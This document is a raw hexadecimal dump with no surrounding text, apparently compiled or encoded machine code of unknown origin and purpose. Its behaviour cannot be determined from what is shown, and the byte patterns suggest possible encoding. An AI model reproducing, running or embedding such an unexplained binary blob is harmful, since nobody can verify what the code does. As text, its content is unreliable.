4c28d4fc2dd5e4063fb98893bf94b73d1e58be79c0000b763fe9dc581e4a4c18039cf0400bef9b0080000e841b71e00e9acba0000b7c1d5782c40c1e5483458c1fd503c4f1fcb6fcc68c3fa6158c372b17148797c7334f329638a000033e89371206c47bfde5b85c64fec42401500ccfa81c18eefa0a11600b7c38c4fcd45b572bfb40c0000ebb417c1ce4f40cb43e068c1ce57fb2b88631a79f0470000000000008037893ffd4b73cb87a29dc38241c5a11a7ec35e94f9b0080000e860840c0048cd45b57088d554e7f85bc581fcb8c18e4fc1c64740c581e4a0c1c65f23fa213434170074488bc3d7781478c3e7481c70c3ff506408cb47e47f9c0f258291050033000084c1d5782c44c5c56804771fcb6fcc69c25290c2737381e2a0a314006fd8c34427fb130000901b80e363601400b7c3d7781478cb47e47f9c8bc1d5782c40c1fd5034471fcb6fcc68c38a49c35291c39b58c3090a8800008bdb548d9cb1a7020148c38a49c39b58c3090a8800008bdb58819c8791020148c38a49c39b58c3090a88000048c303a822020048c1848688020148c3884bc38340c30a0988000048cb43cc7863e5fd1f10f2fd1e14595f02018bcb48818c5e580201ebf42cf388c18c4d4b0201898c4f490201e88d9c060038c716160000e8d2c20700b7c388bcbd02000048c38385fa0936c30a0988000048c58033cef00048cb43d86c26d95cd81f100f1e100e1f58581f1e58591f1f50602f1e50612f1f58783f1e58793f1f50004f1e50014f1f58185f1e58195f1f50206f1e5021284bcdc11f5838384bc5c91e58b9b8cb69eb74c33c8a8889eaf62ee193f9b9000100e8e1c53300173c2c070038c716160000e8415e0800b7c3884bc38340c30a0988000048c580c835f000484d1c1801007438431f100f1e100e1f58581f1e58591f1f50602f1e50612f1f58783f1e58793f1f50004f1e50014f1f58185f1e58195f1f50206f1e5021284bcdc11f5838384bc5c91e58b9b8cb6cee74c35df62ee193f9b8010100e86c4f340017a7b7070038c716160000e8ccd30800b7c38638dbee00834b370fffcec0827bf9746d50c3862fccee0048c588f618eb004873f3bc71ed49471900b7c3884bc38340c30a0988000048c18cf810ed0048c3884bc38340c30a09880000f00fff48c3d7781478c3ff501c70cb47e47f9c0f8c131bcb6faccb52eae19ac5c16804c8c0c017007ca688ac0001008378058b67d5c29b9f000101010000ffeaf9b05c00ebfe9678068861d3c28286000101010000ffead8915c008b5333fc94780789675ac3cf600cefc26c680001010100008bd3548cfc581c38747844c3c76804a32209ab0300fd76488bcb47841b980f000084c1d5782c40c1e5483458c1fd503c4f1fcb6fcc68c5d44150c37a4cbc00010048c3408fcf4ef6e13a8fad3500ccf388c5f37244c1cf42bdbf06000048c10fa62202000fb877a69558e3c5b0d90eea004863d5748e1b978b4bb73c8bcb6eec7487bac50397180100baba0101008a8e3db18949b73e89cb69eb7487bac3d7781478c3e7481c70c3ff506408cb47e47f9c8bc1d5783458c1f5583c4d1dc52188a4790600b7c96d6c87070048c38e36d9ea00487bf78cc10cf576060048c372b1c5d97074dbc24dfbeacd835b00bbbb0101008545cf8bb237010033f388c5c16854f889fe3f88b73efaf8b1877fce60721ec5d970729082605450cbc9664bb9f4430eb97e23e636f0b87d854a0782487c50df3e807af3be98a6cb41c088888644b5af51cc4348c1c96054f3e740143044cf4042cd600c92bb01000048c508f572020033fa81c1cd6004c8ff081f0083e74064404cc1c16854fbcc4340cf488bc31cb722020033fa40cd601c70c5c835f9d5781478c1cd600ca1d57804c81cd7230083e74064404cc1c16854fbcc4345f9b802020048c31cb722020033fa40cd601c70c508f571010089d5781478c1cd600ca1d57804c8539823004cc1c8353c67ec8bc100fd7101004c67e487c518e572020048c5c256eff403757e8a891951cbce4cef0ce6fbf400766490892961cbce4dee6f0981010100ebecc147810101000048b73e89cb41c04acb68ea74bd23d40ce19ac5c2565dc9cfdddecccd60a37be16e7f8889199dcf62cbe74dc27be16e798e8929adcfa2680981010100ebecc1478101010000ff3d8ab73efae8a1b58fc306fd760600487bff24aff34b00b3c111b8a487070049c2d04351c2f05b69c268be9e0f0084c1d5782c5d03011fc367a4cb6fac00ca78795231dbd91500b7c1ccad0056bf01008b40230b1f0300b7c3c6a56373b4c70a09880000417a7b44717234f32951b80000b9912a0200e883881c00b7c35390cd45cf8b1195000048c3cead52be04000048c34083c30b0888000044c9cf3e731f100f1e100e1f58581f1e58591f1f50602f1e50612f1f58783f1e58793f1f50004f1e50014f1f58185f1e58195f1f50206f1e5021294acbc71f5838394ac3cf1e58b9b8cb69eb74c3b91f100f1e100e1f58581f1e585958c3cb6068c1c861ab44ee325bc3583b2cc501008b737b7b078a50cde0fc0b0038c716160000834c30b7c34023979d1d00744c8fc3d7784428cb47841f01039e83c4728370edf60f110048c3ceada0c30300880000834b370fffcec0827bf9746954c3ceada0c3030088000048c5888062e7004873f3bc71eddbd11d0038c40201000048c34083c3ceaddbe893c1010088000048c3cead1e7628ab03000277fc7ff30ce6ef000174f5c8c5c8ada0c1ccb5bcc1c075b5ce4649c1c8b579cc7d70c5d8b569cca5a8c5c07dd8cddc0600b7c38ec72fed0040c472be474a403ad6e90048c18cb55ded00e9d5c3000033000084cb6fc4a8bd20e0fd00007566a1b3b84402000017c7d1010039c30df5fd0001b1b149cb47eceb0f84c1d57834471fcb6fccc8b5b51700b7c37373868d6eee00850d20ab030074675bcb3b2890000000747d41c31310880000eb98cabc050000e8ebe71b006fd8c3141788000048c1d57814787326aa5fe800743d01cd5eaf56a14b370fffcec2807bf974635ec5887093e60048c3c768147873f3bc71edf6ff1e00b7c38e826fe80048c10e0f88000048c38e7c91e80048c1cd6014c00fff48c3d7781489bc050000e8060d1c00b7cd5eae73ee00091e003384c3488bc3d7781c70cb47e47f9c0f84c1d5783c50c1e5480476011615151717161fcb6fac08c38eb656e500487bf78cc1cd601c70c35132d7c50500ccc57d737d45b57845c340234755050016d43f02004cc1a832ffe8008b65a7c24f85febe0100003901378bb43101004142eca7cb43f0b37ef8779e610a9f1afd00be7afcc8898b0c01000fb87830eaedae56008545cf8b78fc000048c5d97004ab4430eaeead56008545cf8b5fdb000048c5c6532be193f9b9000100e83a163b0076f27f4cc13a93220200447d4558042f89189e000048c5c1680266784c5002524470784970755e25b9f7400eb9a72aeba7613de94ff77b40cc991387cc53071c4542fcb662fca286bbcb42c342780944a598c5ce59a347fe0000808800414ac48e62e4ba807ec04f85684da70300745bac6aed7055a26ae47967527af4bb714dc34d2dc96ac38e82eb6c00ebf251c38e731a6c00ebfb58c38e60096c00ebec4fc38e51386c0048c10aa322020044cdf273e3e88afa7b40c5f67703b8717fbf0600006695584216ff0000390c834cfa000f8a344f01007c4b37161cf5000048c5c6532be193f9b9000100e80b203c00744e88c0c168345cc1b89043e600bdb90400004cc1915c098822e7494ec882c25a907909453400784a73754e7e4bb9b40db9f443457ffbb75361c8dd5140c07bfb000100736456cb8c4346c486494c5e025d46d4d8b9f443457ffbb696a8cb41c042780a47b589ca42c9454ef4be62c49ad925f27f40cdf273896e4ba70300745ea96ceb70689f6ce2797a4f7ac48a576ac3beb9e76b00ebf251c3be4e106b00ebfb58c3be5f016b00ebec4fc3be6c326b004c67f093c13a9322020048c5c647b6bc0600004bc6b11f2cb8f34bf79eef8849c5c44b4b62fca29aa7c3402315050700ccf388c3c7681c707bff24eaad5000b3c1d1786409c2d01b09c2e02301c268a21e1e1f1f1d03019d0f84c1d5782c40c1fd5034471fcb6faccb519bca72b1c35a90ca7bb8c5c16804c834032000b7c3cf60143fb96593c4f87e1b6c6f9f73826458c3cf600c60c38307b8b35572e52de931f34545b471bdb901000080fc581c38747844c3c76804a32209ab0300fdb5c3d7787418c3ff507c10cb47841f9c0f0000475a90f8bd04000033fa8c76f3299f890000330084cb6fc4d7ea4f0e540048c18c16eaf900ffea4001540048c18c0bf7f900b0b149cb47eceb0f000084c34f8cc1d15040c1e17858c1f96850c1f15861171ecb6facbfea387954004576c5bec35390cd45cf8b22a6000048c37b96227d09446854cb4b37b7b73fa6227d0d723383bec5b9720ecb45c464227d0f4391a8c5fd501c7063d8bfc5fd501478cb45c44a992fb2c74887cf458acdfd500c1be19ec5fd500413fa36ea76305300482b8b6d45b43804c34625c4f12200b7c373b0cd45b45b63c5fd501c7ccf4582c5fd50147cc7484ae5480c1be1e1fa81c1cd6004dfea3c7a53008545b47c40c37cbec27515e84ac27dbec344274276230014e84ac27dbecd5eaf7d41c34034ea7a3c530048c3d7787418c34d8ec3ff504428c3e7487c10c3f7584c20cb4784011f9d0f25ea030000cc000084c1d5782c40c1e5483458c1fd503c4f1fcb6fcc69c263a0c35192c37ab9cd57a6692ee19ac5cfa2a8bf04ba72fbb37ce75b5e120038c70c0c000033f32baa09cd4cbd7ee2af5b1c0048c37313e931ccb747a07295c34586c3583b85711c0048c37bb8cd45b4625e73c088625963f497c5813474c748f0e13a735b3f00b7c34d8ec3d7781478c3e7481c70c3ff506408cb47e47f9c0f000084cb6fc4d7eabbfc520048cd4588c18c59abf7000f9a5588cb47eceb8bcba669bbf70000b0b1c20f84c34f8cc1d15040c1e17858c1f96850c1f15861171ec96d7c90000048c5c5c077ea2f6b51004576c590227d4d50466d8b1c98000048c3cf604c20cd45cf8b0e8a0000482b7b50c5fd74bbbf202000484bdde701374374b34427f2071d003b06c90efa000f4072d017fa00857a8b2a1fca65a6cbb8c48b310dcbb8c58a4bc9f007754eccf00e7d7845c380f4ea1a5d52008545b45c60c34685c598ac4ff6008362de77c34e8d8939fe4e8920e74e4b0fce8ac3884bc1c869a28c8ec97970b73a8db7398ecb40cb40cb6cee74d0e9c111b8b490000049c2d04b59c2e07351c2f85369c2f05361c268a21f9d0f84c1d5782c40c1fd503458c1f5583c59171ecb6fcc13ccba76c5be2bbc97c58045bef60048c3484060dc778939fe4e8922e54e4b1fdd89c3c86b60cb43c24acb7bf9777f89cb73b86960890000c6857bb90a444a7a8b62956ae8757e897af8b84d0b000014e7b54c0a000014eebc4f09000000ea2165510048c37bb8c5c54949cb7af8777d43c34337ea33775100ebe931f34545b46912b97e80c1fa5bab7afb777386cb7378abc5ad7afa765ca9cb7330e3c8a3cb7378088f846bd6010000b7c38efb07f90048cd45b47f42c28f02c18758e601000000388eca45ce8b7cfc0c8ab0ca0000b7c3d7781478c3ff501c70c3f7586408cb47e4611f9d0f8c131bcb6fcc99be070000e888bc2300cce8e8fa219f6c1b008545b579e41e0b020017352301004cb2b8be070000e8794d230075498bcb47e47b980f84c1d5782c5f1fcb6fcc13e893c5b01cd4f50048c3873773cd4cbd7ee20bf91a0048cba71f3b48cb40cb40c97afb04040072ab69b149c3d7781478cb47e47f9c8bc1d5782c40c1e5483458c1fd503c4f1fcb6fcc68c379bac372b173f1bf71b4b1eab714c35291c3a063cd68997b47c34632ea80c55000ff2a5144b47d41cb40d35873e5ab95a873e5aaa09c73e4ab5965cb403bb0cbf883f874615dc3b87bcd73827945c34531ea7530500033fa36299ecb68fb58c5ce4b4073fcb2a2e5f288c3d7781478c3e7481c70c3ff506408cb47e47f9c8bc1d5782c40c1fd5034471fcb6fcc68c37ab973f1be526ec5d7a2b0c3b073cd7a8b7945c34430ea195c500033fa36289fcb68fb58c5ce4b4073fdb3ab96c3d7781480b149c3ff501c70cb47e47f9c0f84c1d5782c44c5c56804771fcb6fcc69c2727281e21f2d25006fd8c39622e2dd008b404862de777b2ee60cf700489b184084e7c5f62400b7c3488bc3d7781478cb47e47f9c0f000080c75794cb6fc490bb0300004dc0c65b5dc0ce4b81cd601c71c4de4b91cd606409c4c643e067700000b7cb47eceb0f0084c184946ef70048c184976df70048c184966cf70048c184916bf700c30f000084c34f9705011615151414161fcb6fa4c372bc76dea965497058f6b741c83c90a4800000837afb0d8b0a8e0000837afd7056a17aff098b04800000837af17c60977af27f7b8c7af67b05fcccaa687bf9771f82afac37012100b3c763a0cd45b57d8b4b3716cb20020048c38340c39ef0be5b00488923e64c4bd23ae230407d707f43cb42d15873f1bf87c1fafaf388cd4cc69a554545b567fa4343170038c716160000e868671800145cffc5d4514872c4b6c83c90a4800000ebd4bc6aeb7647b06aed7067906ae07d54a36aef7266917af8757037e830c96ac590ac47f600ebf251c590bd56f600ebfb58c590ba51f600ebec4fc5909b70f60048cb2780bc9800000040c472827fb2ba030000e88ebf26006fd0c47282635fc39ebc72db008b414962de777b205b9b1986c77111e84fc7b072ca7cfe0e9b54480ca0ac8800008444cf8a3abf00004dc87a8a6d58c472827d48ccc24ceb99a8260046ba030000e8bb993500befdac190900837cf47c37014eac5f8f4973c2ce4d40c10da0bc98000048c1cd601479cae66d08837cf77d23bee6d3220074cb50990da0b490000089cd6004c8132723003887509c8c0000837cf77d477ac38ea1fe5a00488921e44d4a464548c38690c75a00488920e54c4bcb80c1cd600c6073fab54579cbe3680848cb43d0fb00a3c39ecf00da008b494163df86f94000002be3fbf3889b1b807bf18ac18ae8ed47fdac19090040c472827eb3ba030000e8586827007f3c98ac88000000747037f32b8ae27cf77d6bf698ac2300b7c35391c24487c39e1a424d00ff2d59d8439b448ebe283cfa58c24487c38efcb54c00ff2f5b448ebe28547cf47cb4824eac5f8fcef5c30fa0bc98000049c0cc4d8b7cf77dd944cdf923007407a8b490000089c158fb70d3cb478c091e1e1c1c1d030105980f000084c39e30ffda008b41827b26e100f4008362de779b1982cd57dd9a55030f000084c184d029f400c38bc1d5782c5f1fcb6fcc68c396ee2ad90048c3727240837b2ea24bf4008362de779b1883cd5eae7137f32be546c34034ea421b4c0048c344302c9bc3d7781478cb47e47f9c0f0000478eab5af400c30f84c34f8cc1d15040c1e17858c1f96850c1f15861171ecb6fbc1576c5bfc263a0c379bac372b1cd57a6675ec845b47a4a7c0a47536ecd4cbd706222cdb802f388c3d7784428c3e7484c20c3ff505438c3f7585c30cb4794111f9d8ac25a99c5c16814d8cdf32900b7c3cf601c7475898839010075605dcd7a8b7209b9b060ef8ebcba010000e94da400000fb9b846c5d9701cd0dd2f1a00bbba0100008545b42519c3c7681c7ccfc2414c7ff0b5516e7ad29556a1c24581de5b49ca4d8ecd7ab3c74dc99a5549cd600c60c1f55804dfea5d024a0048c3c7681cbd45b57a472b22494073d39a487e7c4e777540bfd251e3d67cca4d8ecd7abbcf4087c74dc99a557ab309000089cd600c60c3cf601c70c1f55804abc344f3ea154a4a008545b57be6e7ea1a007c483438c72a2a0000447c4c506c3c7844c3c76814b32209ab0300fd76482a1e090100ba76fa20594e0100bf131bcb6fcc68c38e32c4f30048c35192713b76629d0a29ab030085804eabe000757de05cb1050048c18a4bcb47e47b980f00008c131bcb6fcc68c38e9e41da0048c35192713b76629d0a29ab0300858012f7e000757de090890e00b7c18a4bcb47e47b980f000084cb6fc460cd4cbc60fd868a1b0038c716160000e8aba01c007c4b3714e888ca5950cb47eceb0f0084c34f8cc1d15040c1e17858c1f96850c1f15861171ecb6fccab8eb047f20033e864bc0300008545b572bfb8020200ebee3efcc8438b8f2bab72b2080000898c9562f200e803382c00ccfa81c18c8f78f200e86d572d00b77124638cf200755a95b208000089b4549bf20048c3442729122c00ccfa81c18c6592f200e8b3892d00b7712449a6f2007570864b37149e39c778bbc5b8668dde0048c5a019eade0048c5c07d7576f37a1aaf0f00e84b7e2200b7c38e21d6f20048c598d028ed0048c3404862de778920e74fc0a52a4ec3488b8939fe4ec38fc68ac3c7442060cb42c34acb7afb7571c1c1f8010000b7b73c8bcb469d11ca45ce40cb459e10cb6cee74ebadf388c3d7781478c3e7481c70c3ff506408c3f7586c00cb47e4611f9d0f8c131bcb6fccc839c71600e814eb170033e893c386ae52f10048c38707e37686180048c38e9662f10048c3870f4bcb42f1cfea90c2470048cb40cb40cb78e36da499c3867985f100e887be2e00b7cba64296f1000048cb47e47b980f84cb42f178b7da60024700cc84cb42f178b7da64064700cc74b9010000878240b4f100c383171fcb6fcc68c5b08a6cdb004871043df1f100745f92bd040000e82c172c006fd8c35c9fc580e419f000e804ef030048c18cd82df000b9bd040000e81f242c00b7cb47e47f9c0f84cb6fc4c057682800b7c5d9701478c3031890000048c1c5681478c343208e9b0200b7c3cf601478c38b48cb47eceb0f3c0fbe5158c30a61e0000048cd45b477f30fff48c30a71f0000048cd45b477f30fff48c30a69e8000048cd45b477f30fff48c30a8101010048cd45b477f30fff48c5cc7979f9be06000048c59876bfdc00487169a0847f43c39b58cd57a677f30ffd4acbfb90e8747844c3dba8b0cd57a677f30ffd4acb43e069ca6be974be83c302a9210100e990780100cc84c1d5782c40c1e5483458c1fd503c4f1fcb6fcc68c30a79f8000048c35291cd45b40d31c5801bcbdd004873fab51925c30863e0000048cd45b415e2bb38752914c3007bf0000048cd4cbd6295ba397564f90a2d3000b7c30073f80000e8f20d170048c30063e8000048cd4cbd6295ba397564f9280f3000b7c30073f80000e8ec1c180048c3006be00000e840673000b7c30073f80000e874533000b7c3088301010048cd45b433c4bb3875370ac3008309010048c96817fe0000e890b73000b7c3009b110100bf3f8000004863e4278cab3000b7c300931901004863e427bd9a3000b7c3008b010100e8a1863000b7c300ab210100e84da5000048c53e9b290100bdbb06000048c5f64370c58813cddb0048717eb7846e52c38447cd4cbd6691ba397578e5e6c13000b7c385e6eec93000b7cbfc97e874675bc3c4b7b0cd4cbd7e89ba397570ed04223100b7cb45ce40cb44e768cb6eec74c4f9c34083c3d7781478c3e7481c70c3ff506408cb47e47fb62b0c3100330084cd4cbd6854c588e9b75b004873f3bc64a8b9010000f0ffce40dd5d0100ff3f037b47000080bc0f84cd4cbd44631bcb6fcc68c588bae45b0048c3529173f3bc639c0add5d01008545b578e56c93170048c3402380a63100b7cb47e47b980f0084cd4cbd6e52c58889d75b004873f3bc7a8d4b370fffce40dd5d0100ff370b7b47000080bc0f000084cb6fc460cd4cc68b1296000041c24a360fb445485958c30a61e0000048cd45b470f4b4450940c30a71f0000048cd45b470f4b4450940c30a69e8000048cd45b470f4b4450940c30a8101010048cd45b470f4b4450940c5cc7979f9be06000048c598d418d900487169a0847844c39b58cd57a670f4b4450b42cbfb90e8747945c3dba8b0cd57a670f4b4450b42cb43e069ca6be974bc81c302a9210100e8ddca0000b7cb47eceb8bc1d5782c5f1fcb6fccc8bd812b00b7c373738675a2da00850d20ab0300747844c3130890000048cd5eae438fbd040000e8ead22f006fd8c5021f90000048c39e36ceed00e8ce26000048c35361bd040000e8dde52f00b7cd5eae73eec7e131003384c3488bc3d7781478cb47e47f9c8bc1d5782c5f1fcb6fcc68c371b2cd57a63d01cd4cbd300cc3925173e1af704dc34929d271c19859c34122c5d10300b7cd5eaf566ac34023445201007cf86b1075615cc5885a88d7004873e3ac7c40c340237a6e0300b7c34c2ce931f388c3d7781478cb47e47f9c8bc34f8cc1d15040c1e17858c1f96850c1f158611765dea1c1b88732800044cf5e9dc37ab0fa58e3000043ce89175bc3756722ee5500002be91329b42fa389c243808920e54ac5873d7862d2bb4db8a31b82c7f5d9e57ae06e7362e541e2614eb8be84ccfed9e57be16e7362e542e169ca42c34acb68ea757e6ce357a671635deaa5bdc6b876ceb87de1e3bc6c9d4cb07f43c8d5a714ef41c8dd51447ee8adf4094b3714e042c24b884bc381cacf82ce40c3d7783458c3e7483c50c3ff500468c3f7580c691f9d0f84cb6fc460cd4cbd56cac2d500007a45b86151d0d075d9e40000737c474bc388c5808fe765008b8fc52ae931f388cb47eceb0f00000000008473eade8944c2000048c1e5480477161717161fcb6fcc68c1d578640dc67ab9c1fd506c01c263a4c5ed407418c371b4c3a9254dc7729f0069109b840000000049c25496c27fb877dc90522a105b440049c24531eaca9d420048c3589bc3458fbe29534588474091964bf6bd73cc8196acc74e8dc34c8f73e4ab5f63cd6899526e63f4d0105f406669109b84000000000fb9be07b9a2178b840f8b9858c5cd4148ca6be9749fa263d6b472c488e5dec7ef407418c3ff506c00c3d7786408c3e7487c10cb47e4611e1e1f019c0f0000008c15141515171ec96dac44040048c38ec903cf00487bf78cc10da0240404004dc67ab8c263a4c76aa9cd4cbc6f52cd57a661fdc1f5230038c716160000e8162425001639d202004dc845b492abc84cbd95a9cb79f80d8d3ebe020048c115b81c3c040048c13d901434040048c135980c2c04004cc52588042404004cc535983c1c04004cc1f785b343a052b14ffabc76dedee19bc24c8e62ef8cbf02bdc5fd7149cb7df67f5d67c64582c74e8cc25c9ec2472491870100b6ca6eec0e87a62c02004ec5ef88cc6ec53750fc120200eb2a89993fa7c2458647a05abc4af70bea90c4410048c35d9fc2478dbe295345be5765c74e8dc35d9a77dd926a53c6478067e5c1b9b4434eb9ba1d50c98c15998242c5df5348ca6be9749da1c24531ea5307410049c25c9ec2478dbe295345be5765c74e8cc25c9a76dc936a53c6478166e4c0b9b4434eb9ba1d50c98c15998242c5df5348ca6be9749da1c24531ea1246410049c25c9fc3458fbe295345be5466c74e8cc25c9e72cc836b53c7458366e45f9fb9b4434eb9ba1d50c98c15998242c5df5348ca6be9749da1c25795c27499f6d873c885556b4bde9573e5ad6852c24531eaa7f2400048c35d9ec3408abe295345be9caa73c88469564bde9472e4a8615fc24531ea9acf400048c35d9ec3408abe295345be9caa63d6b573c588605fc24531ea6431400048c35d9ec3448ebe295345bf9daa73c089320cc74e8dc35c9f73e4ab5068c7408767e4a969105b44000fb9b4434eb9ba1d50c98c15998242c5df5348ca6be9749da073ccf88adaa00000b7c3781abea80000b74bfeb573cc84506b63d6b573c5886d52c24531ea1346400048c35d9ec3448ebe295345b496aa73cc856c5663d6b472c78a605fc24531eaf6dc3f0048c35d9ec3448ebe295345b496abc24487c34c8f63e08262ef8c73fabd5a6a77dc94635ec7ed88cc6ac33550fc12020049b63a8c72e4d08c750b0200b3c7680a21350200b672e4ac635ac3d5b0cc6ec73550fc12020049b63a8977dce88c532d0200b3c774164b5f0200b3c727880424040048c337980c2c040048c33f901434040048c317b81c3c04004cc737983c1c040048c307a824040400487bff2491e16700b7c94584440400411f1f1d019e8bc1d5782c5f1fcb6fcc6576e19ec75197c84cbc5964cd4cbc5964cd57a660fce0d1260044ad1600008991f0340b2800bbcf5892ca498ac3d7781478cb47e47f9c8bcd4cbdad91cd57a6a099c84cbc7041cc99fa3593c845b57041cc99fa2b8c67ea89c35a98c25092c272b0ca7a068a6054cb8e14988a4ab73d4644b45d61cb68ea749806ca60cb8e14988a4ab73d4644b47844cb68ea75724ecb6cee7492afcd7a8a7647cc9a5acd5eaef2ceca7a068a7b48cedc4de6bbc9de03b99a8c0000bbcc99f98cbc27004499220000e9bea80000330084cb6fb410c38ec806cb00487bf78cc1cd606473f38cc74182cb7bd86cc74ab204b18240242048b73f88cb7bd85c8c7a88e9f410b96698892be90cb9764363e708b9fa58342fa46a88b63e49c4583461cb8b8544b5a836f45e4eb9777bbb010000414eb97f4a62e64f8929ebd03166d05024556a56b63f85cf824dc14dbcaceaf388c3c76864087bff24e29d6800b7cb479c9b8ac24b2b0201cfbf67003300008976f329e900000048c1d5782c5f1fcb6fac08c35192c372b1cd4cbc61fc7e41280038c716160000e883bd2900ccf32b892acd57a693af73f1b981bbc25b98c5c16804c8200f3800b7c3c76814b3fa710875704db73420ce6dc5deacb7b7358273c18d7d05b9b4f4b24c111d719ba6c3408363e14962e04963f291b7344bfc581c38747844c3c76804a32209ab0300fdb5c3488bc3d7787418cb47841f9c0f0084cb6fc4c03f341c00ccfa4d44cf9b554a4a89cb47eceb0f8c1514151514141717161fcb6f8c28c5e1481478c1d43d28c1fc1d20c1f40d38c38e5f90ca00487bf68dc1cc6564cf61afce72b1c35a9cc66ba8c5c04de8fed13800743e3d880000857383724fc3ce4d83fb7cfb6a0d90000045ce4482c64f4f45d5c951e7400c2848cbe74004208361eaf73d3dea7a543b004c2f937545b57234cc1618f1000049c275b64bfcb7c5c25f5873c2b153db88cd44b5013dc5c25f5873c2b153db886be289753d04040048c5ca57674d7273c3b053d2816beb80c5cc4e4773fab67d42f0480f0000000000f047cb631018fe3b2d004863cba8c5d1781478cd5eaf0dbec4cf00cc00ebf75473c3b053d2816beb20230f3b00b7c35390cd45b47ac9c7dd00dd0048cb40d3fbe931e893cd5eaf3c04c74cf4e19ac34023e3a25600bace448bcdfd500c65c64f8cc1d578049abb0100008b4531eab39c3a008545b46e56c7060d80000044cf4b88c35892ca4632ea311f3b008b7313e931ccb7cd5eaf6559c5c6bb71b8e400dd007570edf8d43b007ffd6518747f43c3ce45832308ab0300fd764c8fc3c66d687bfe25413d6b00b7c3d63d28c3fe1d20c3f60d38c5e855711e1e1f1f1c1c1d019e0f00008c1514151514141717161fcb6f8c28c5e1487418c1d41d08c1fc3d00c1f42d18c38ea36ec800487bf68dc1cc4d402b3e3d2dc672b1c1dc5545ce63a0c3727c5ea56a5cc3589ac242214bae0d003bf84ed5597d7e89539ccffe0d3dc07383724fc38c43cffb7cfb6a1d80000044cf4086c64c86ca45d5c951e7400c2848cbe74004208361eaf73d3deab29e39004c2f836545cf8bff79020049c25f9df1480f0000000000f0474bd19ac5c75a5873ea9953db88cd44b5063ac5c75a5873ea9953db886be289753d04040048c5cf5267407f73eb9853d2816beb80c5cc4e4773fab6744ac24b88cb631018a6652b004863cba8c5f9507418cd73f98b7efb0100c7c1ca00cc00ebf75473eb9853d2816beb20173d3d00b7c37bb8cd45b47ac9c7dd00dd0048cb45d6fbe931c5becd73f98b41c4010044cded400c6ccf4086c64c8fc1fd50049abb01000041ca4531eaf7da38008545cf8b1b9e010048cbe740644045ce4784cbe7401c384cc74d8ecbe740143041ca5e99c7f67d83e7400c2849c24487cbe7400420e8d0f63100b72b9b7d45cf8be663010041f9b804040045c06d9c26d9ce35f545cf8bca4f01003bc3f780cb45010048cbe740644045ce4784cbe7401c384cc74d8ecbe740143041ca5e5ccd600c61c24487c3ce2d20c1cd6004c83712320074737d45cf8a890d0100e9ec04010048c35c9f4bd19ac5c75a5873ea9953db88cd44b5023ec5c75a5873ea9953db886be28872fb88c5cf5267497673eb9853d2816beb80c5cc4e4773fab67d42f0480f0000000000f047cb63101810d129004863cba8c5d1787418cd5ed48b20a40000c7c4cf00cc00ebf75473eb9853d2816beb2041683e00b7c35390cd45b47ac9c7dd00dd0048cb40d3fbe931e893cd5eaf073bcbe740644045ce4784cbe7401c384cc74d8ecbe740143041ca5e5cf5580c61c24487c1d57804c8fadf32007a45b4467acbe7401c3833e19a6975701474cf4444ce353cc74882ca454b45b5134775700c6069757004dfea4f6d37008b737d45b51528c5c6bb71b8e400dd007570ed331b3f00ccccb7cd73826559c5c3be71b8e400dd007570ed2b033f00744c8fc3c645407bfe2585fc6e00b7c3d61d08c3fe3d00c3f62d18c5e875511e1e1f1f1c1c1d019e4acd600c60c3ce2d20c1cd6004cb7fdcc5c6bb71b8e400dd0075d24f93bb3f00144b6c84c1d5782c40c1fd5034471fcb6f9c38c379bbc25291c35a90ca73b0c5c16874b8cbe13d00740fa0e4c0000048c5c1687cd1cd60640cc740400fa09cb8000044cf4c4ecd601c70c35d5d0fa094b0000089cd601478c30fa08ca8000048c1cd600ca30fa084a0000089cd6004c8dbcf03007ffc584c68747844c3c76874d32209ab0300fdb1c1d1785439c2d04b59c2f86b51c268bc9c0f0084cb6fc460cd4cbc6cf1a29b2e0038c716160000e8f7cf2f00b7cb4b37b7cb47eceb8fc74af2e19ac3864791db0048cb47ec60b7da82913600cc000084c1d5782c5f1fcb6fcc68c35192c372b1cd4cbc7f42c341222f78400014b310cd57a772ef93c4400014a102cb791a974e75c74186c74a2af0f34a4815007a45b45c60c34023327451007a45b46850c74087c74c8fc386ec3bda0033e12dea5c7f360048cd45b4a53ae6e5457d2f0038c70c0c000033f388c3d7781478cb47e47f9c0f0084c1d5782c40c1e5483458c1fd503c4f1fcb6fcc9afa4000008b4122b0983f00ccc5bec35390cd45b43804c525a81010004873feb14975c5f54878c5c29f9576f37a1aaf0f00e8a5873500b7cbccb707b7c1bef0804f08000a00cc814b068ae76af5b8c8ff7946c5f23f08c5ca979873feb0b28fc378c0fa214b1d4100b7c3d7781478c34d8ec3ff506408c3e7481c70cb47e47f9c0f000084cd4cbd3e02c1d5782c40c1fd5034471fcb6fcc68c53cb110100048c35291c372b173f5ba665ac34430ea4c6d340048cb44870873c58b9ba6c34023a0f64100b7c3d7781478c3ff501c70cb47e47f9c8bc1d5782c40c1fd503458c1f5583c59161fcb6fdcbb7ac2e850484278f92020000f9d524545b560fd6b4c300044b20900008991f0bf9931007448288fddbe070000e871593f006fd8c370b3c1d57804ab8e8f57dd003bcb8c4777c1b042a6d900497025e38b76e9c9ca42540100b6c08dfbb7cd45b57088d554e7f2928e5b83dd00834380c98c5088dd0048b7388fc1f55804cb2a78be070000e87d553f001473d0c3d7786408c3ff506c00c3f7587418cb47f4711e9c0f842baa81c5980bc7d90048c34a4262de778939fe4e8920e74e4b0fce8ab7da687e3300cc842baa81c598ef22d80048c34a4262de778939fe4e8920e74e4b0fce8ab7da14023300cc84c1d5782c40c1fd503458c1f5583c59171ecb6fcc682bba5c4cb10a4926a362dc00731922c370b7c1b8876ad8008364d877c378bb893ff84e8926e14fc28ff200b27c003975330fcbff4410d78b4bd7f01f0700837bf97452a25eaf623df3ac7f30e3ad6ea24d0b000014e7b54c0a000014eebc4f090000cce12deaddfb330049c28ff2becbcf7410d7ccf32bfdfef5d3310038c709090000e81a3f32007ca320834b37b7c3d7781478c3ff501c70c3f7586408cb47e4611f9d0f0084cb6fc4ab7a078b60fd2e0b32007ca320e83613320038c709090000eba5cb4cb14a0936f127db007359622bb299c580fd27d70048c3494161dd778939fe4e8923e44ec38fc537b254283975734fc3cf5438c3f7f493b632007ca320e87b5e320038c709090000e880a43300b7cb4b37b7cb47eceb0f000084cb6fc4ab7a078b78e586a3320038c709090000eba9c74cb15615368157db0073556e2baa81c5989557d70048c34a4262de778939fe4e8920e74ec38fc6cdb9f24c30bb63a0abf9fac7e2320038c709090000e8ecc83300ccf388cb47eceb0f84c1d5782c40c1fd5034471fcb6fcc68c35252ca5530273f3e773fc1ca55bc68b437c8b21252718be2711048c3fa7940c1b8b47a8151c78d8d170074438ccf4c8fc35d3eb0540c003bc38c